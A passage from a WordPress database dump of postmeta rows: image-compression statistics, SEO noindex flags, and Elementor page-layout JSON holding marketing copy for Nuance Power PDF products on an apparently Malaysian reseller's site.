5:{s:7:\"percent\";d:4.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:271;s:11:\"size_before\";i:5465;s:10:\"size_after\";i:5194;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.319999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:359;s:11:\"size_before\";i:10823;s:10:\"size_after\";i:10464;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.20999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:956;s:11:\"size_before\";i:43253;s:10:\"size_after\";i:42297;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.770000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1926;s:11:\"size_before\";i:69473;s:10:\"size_after\";i:67547;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.729999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:334;s:11:\"size_before\";i:8950;s:10:\"size_after\";i:8616;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.45999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:502;s:11:\"size_before\";i:20404;s:10:\"size_after\";i:19902;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:767;s:11:\"size_before\";i:31754;s:10:\"size_after\";i:30987;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4561,29,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.959729440338460193515857099555432796478271484375;s:5:\"bytes\";i:9159;s:11:\"size_before\";i:76582;s:10:\"size_after\";i:67423;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:323;s:11:\"size_before\";i:3162;s:10:\"size_after\";i:2839;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:822;s:11:\"size_before\";i:7481;s:10:\"size_after\";i:6659;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:4495;s:11:\"size_before\";i:30960;s:10:\"size_after\";i:26465;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.2799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:487;s:11:\"size_before\";i:5246;s:10:\"size_after\";i:4759;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1125;s:11:\"size_before\";i:11675;s:10:\"size_after\";i:10550;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1907;s:11:\"size_before\";i:18058;s:10:\"size_after\";i:16151;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4562,1384,'_yoast_wpseo_meta-robots-noindex','1'),(4563,1385,'_yoast_wpseo_meta-robots-noindex','1'),(4564,1387,'_yoast_wpseo_meta-robots-noindex','1'),(4565,1388,'_yoast_wpseo_meta-robots-noindex','1'),(4566,1389,'_yoast_wpseo_meta-robots-noindex','1'),(4567,1390,'_yoast_wpseo_meta-robots-noindex','1'),(4568,1393,'_yoast_wpseo_meta-robots-noindex','1'),(4569,1394,'_yoast_wpseo_meta-robots-noindex','1'),(4570,1395,'_yoast_wpseo_meta-robots-noindex','1'),(4571,1396,'_yoast_wpseo_meta-robots-noindex','1'),(4572,1398,'_yoast_wpseo_meta-robots-noindex','1'),(4573,1399,'_yoast_wpseo_meta-robots-noindex','1'),(4574,1400,'_yoast_wpseo_meta-robots-noindex','1'),(4575,1402,'_yoast_wpseo_meta-robots-noindex','1'),(4576,1403,'_yoast_wpseo_meta-robots-noindex','1'),(4577,1407,'_yoast_wpseo_meta-robots-noindex','1'),(4578,1405,'_yoast_wpseo_meta-robots-noindex','1'),(4579,1408,'_yoast_wpseo_meta-robots-noindex','1'),(4580,1410,'_yoast_wpseo_meta-robots-noindex','1'),(4581,1413,'_yoast_wpseo_meta-robots-noindex','1'),(4582,1415,'_yoast_wpseo_meta-robots-noindex','1'),(4583,1416,'_yoast_wpseo_meta-robots-noindex','1'),(4584,1417,'_yoast_wpseo_meta-robots-noindex','1'),(4585,1418,'_yoast_wpseo_meta-robots-noindex','1'),(4586,1420,'_yoast_wpseo_meta-robots-noindex','1'),(4588,1425,'_yoast_wpseo_meta-robots-noindex','1'),(4589,1421,'_yoast_wpseo_meta-robots-noindex','1'),(4590,1427,'_yoast_wpseo_meta-robots-noindex','1'),(4591,1428,'_yoast_wpseo_meta-robots-noindex','1'),(4592,1429,'_yoast_wpseo_meta-robots-noindex','1'),(4593,1431,'_yoast_wpseo_meta-robots-noindex','1'),(4594,1432,'_yoast_wpseo_meta-robots-noindex','1'),(4595,1433,'_yoast_wpseo_meta-robots-noindex','1'),(4596,1457,'_yoast_wpseo_meta-robots-noindex','1'),(4597,1461,'_yoast_wpseo_meta-robots-noindex','1'),(4598,1467,'_yoast_wpseo_meta-robots-noindex','1'),(4599,1470,'_yoast_wpseo_meta-robots-noindex','1'),(4600,1491,'_yoast_wpseo_meta-robots-noindex','1'),(4601,1492,'_yoast_wpseo_meta-robots-noindex','1'),(4602,1495,'_yoast_wpseo_meta-robots-noindex','1'),(4603,1498,'_yoast_wpseo_meta-robots-noindex','1'),(4604,1499,'_yoast_wpseo_meta-robots-noindex','1'),(4605,1501,'_yoast_wpseo_meta-robots-noindex','1'),(4606,1504,'_yoast_wpseo_meta-robots-noindex','1'),(4607,1505,'_yoast_wpseo_meta-robots-noindex','1'),(4608,1506,'_yoast_wpseo_meta-robots-noindex','1'),(4609,1555,'_elementor_edit_mode','builder'),(4610,1555,'_elementor_template_type','post'),(4611,1555,'_elementor_data','[{\"id\":\"b48cde6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"de68660\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1feef6e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Leading the way in PDF productivity\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fbca78f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"822f2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7966f80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>There are many options today, but only one makes sense: Nuance Power PDF<\\/h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctly\\u2014at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"557fab3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6ebfee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6446727\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-standard3-left-250x230-en-us.png\",\"id\":2775}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"784ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Standard<\\/h3><h4>Fast and accurate conversion and editing<\\/h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution<\\/p><p>Combine, edit, assemble, fill forms and share PDF files<\\/p><p>Scan paper to PDF and create Searchable PDF files<\\/p><p>Easy-to-use Office-style interface with clear and accessible tools<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1da2552\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9ca96\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-advanced3-left-250x230-en-us.png\",\"id\":2776}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8271839\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced<\\/h3><h4>For enhanced security, signing and collaboration<\\/h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction<\\/p><p>Sign and send PDFs for signature with DocuSign\\u00ae<\\/p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5dc247\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4617f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/icon-img-power-pdf.png\",\"id\":2777}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"df77d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced: Volume Licensing<\\/h3><h4>Enterprise deployment with a single license to manage<\\/h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support<\\/p><p>Capture budget savings on licensing<\\/p><p>Superior IT management with flexible and customizable deployment options<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4612,2772,'_wp_page_template','template-fullwidth.php'),(4613,2772,'_elementor_edit_mode','builder'),(4614,2772,'_elementor_template_type','post'),(4615,2772,'_elementor_data','[{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df9ce51\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ebb69bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d540be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Nuance<\\/h3>\\r\\n<h3>Print, capture &amp; PDF solutions<\\/h3>\\r\\n<h3>Gain control of your documents<\\/h3>\\r\\nNuance document imaging solutions keep your organization\'s most vital information private.\\r\\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure<\\/h3>\\r\\nPrint and scan securely with Nuance solutions.\\r\\n<h4>Industry compliance<\\/h4>\\r\\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\\r\\n<h4>Seamless integration<\\/h4>\\r\\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\\r\\n<h4>Workflow management<\\/h4>\\r\\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\\r\\n\\r\\n<hr \\/>\\r\\n\\r\\n<h3>A comprehensive portfolio for managing your documents<\\/h3>\\r\\n<h4>Print management<\\/h4>\\r\\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\\r\\n<h4>Document capture &amp; workflow<\\/h4>\\r\\nRe-imagine your company\\u2019s document capture workflows with our intelligent solutions.\\r\\n<h4>Mobile Document Imaging<\\/h4>\\r\\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\\r\\n<h4>PDF &amp; document conversion<\\/h4>\\r\\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\\r\\n<h4>Cost recovery<\\/h4>\\r\\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\\r\\n\\r\\n&nbsp;\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4617,1555,'_elementor_version','0.4'),(4619,2773,'_wp_page_template','template-fullwidth.php'),(4620,2773,'_elementor_edit_mode','builder'),(4621,2773,'_elementor_template_type','post'),(4622,2773,'_elementor_data','[{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fbca78f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"822f2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7966f80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>There are many options today, but only one makes sense: Nuance Power PDF<\\/h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctly\\u2014at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"557fab3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6ebfee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1da2552\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d5dc247\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"df9ce51\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ebb69bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d540be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Nuance<\\/h3>\\r\\n<h3>Print, capture &amp; PDF solutions<\\/h3>\\r\\n<h3>Gain control of your documents<\\/h3>\\r\\nNuance document imaging solutions keep your organization\'s most vital information private.\\r\\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure<\\/h3>\\r\\nPrint and scan securely with Nuance solutions.\\r\\n<h4>Industry compliance<\\/h4>\\r\\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\\r\\n<h4>Seamless integration<\\/h4>\\r\\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\\r\\n<h4>Workflow management<\\/h4>\\r\\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\\r\\n\\r\\n<hr \\/>\\r\\n\\r\\n<h3>A comprehensive portfolio for managing your documents<\\/h3>\\r\\n<h4>Print management<\\/h4>\\r\\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\\r\\n<h4>Document capture &amp; workflow<\\/h4>\\r\\nRe-imagine your company\\u2019s document capture workflows with our intelligent solutions.\\r\\n<h4>Mobile Document Imaging<\\/h4>\\r\\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\\r\\n<h4>PDF &amp; document conversion<\\/h4>\\r\\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\\r\\n<h4>Cost recovery<\\/h4>\\r\\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\\r\\n\\r\\n&nbsp;\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4623,2773,'_elementor_version','0.4'),(4656,2780,'_wp_page_template','template-fullwidth.php'),(4657,2780,'_elementor_edit_mode','builder'),(4658,2780,'_elementor_template_type','post'),(4642,2778,'_wp_page_template','template-fullwidth.php'),(4643,2778,'_elementor_edit_mode','builder'),(4644,2778,'_elementor_template_type','post'),(4645,2778,'_elementor_data','[{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fbca78f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"822f2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7966f80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>There are many options today, but only one makes sense: Nuance Power PDF<\\/h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctly\\u2014at a price that makes sense. See why switching from Adobe 